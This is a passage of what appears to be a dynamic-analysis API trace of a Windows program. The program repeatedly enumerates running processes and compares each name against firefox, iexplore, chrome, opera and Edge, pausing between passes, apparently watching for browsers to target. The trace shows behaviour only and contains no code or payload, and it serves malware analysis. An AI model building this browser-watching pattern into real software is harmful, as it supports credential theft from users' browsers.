(lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0208.936] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0208.936] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0208.936] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0208.936] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0208.936] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0208.936] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0208.937] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0208.937] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0208.937] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0208.937] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0208.937] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0208.937] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0208.938] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0208.938] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0208.938] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0208.938] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0208.938] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0208.938] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0208.938] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0208.938] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0208.938] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0208.939] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0208.939] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0208.939] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0208.939] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0208.939] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.939] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0208.939] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0208.939] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0208.939] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0208.939] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0208.939] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.939] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0208.940] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0208.940] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0208.940] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0208.940] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0208.940] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.940] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0208.941] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0208.941] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0208.941] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0208.941] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0208.941] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.941] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0208.941] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0208.941] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0208.941] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0208.941] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0208.941] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.941] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0208.942] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0208.942] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0208.942] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0208.942] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0208.942] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.942] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0208.942] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0208.942] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0208.942] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0208.942] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0208.942] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.942] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0208.943] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0208.943] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0208.943] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0208.943] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0208.943] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.943] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0208.944] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0208.944] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0208.944] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0208.944] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0208.944] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.944] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0208.944] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0208.944] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0208.944] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0208.944] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0208.944] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.944] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0208.945] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0208.945] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0208.945] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0208.945] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0208.945] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.945] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0208.945] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0208.945] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0208.945] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0208.945] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0208.945] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.945] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0208.946] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0208.946] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0208.946] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0208.946] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0208.946] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.946] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0208.947] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0208.947] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0208.947] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0208.947] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0208.947] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.947] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.947] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0208.947] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0208.947] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0208.947] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0208.947] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.947] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.948] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.948] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.948] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.948] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.948] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.948] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0208.948] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0208.948] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0208.948] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0208.948] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0208.948] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.948] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.949] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.949] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.949] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.949] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.949] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.949] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.950] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0208.950] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0208.950] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0208.950] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0208.950] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.950] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.950] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.950] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.950] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.950] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.950] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.950] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.951] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0208.951] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0208.951] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0208.951] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0208.951] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.951] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0208.951] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0208.951] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0208.951] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0208.951] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0208.951] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.951] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.952] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0208.952] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0208.952] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0208.952] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0208.952] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.952] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.952] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0208.952] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0208.952] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0208.953] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0208.953] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.953] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.953] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0208.953] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0208.953] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0208.953] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0208.953] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.953] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.954] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0208.954] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0208.954] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0208.954] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0208.954] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.954] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.954] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0208.954] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0208.954] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0208.954] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0208.954] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.954] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0209.002] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0209.002] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0209.002] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0209.002] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0209.002] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0209.002] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0209.003] CloseHandle (hObject=0xe8) returned 1 [0209.003] Sleep (dwMilliseconds=0x3e8) [0210.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0210.060] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.061] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0210.061] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0210.061] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0210.061] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0210.061] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0210.061] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.061] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0210.061] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0210.061] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0210.061] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0210.061] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0210.061] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.062] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0210.062] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0210.062] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0210.062] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0210.062] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.062] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.062] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0210.062] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0210.062] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0210.062] lstrcmpiA 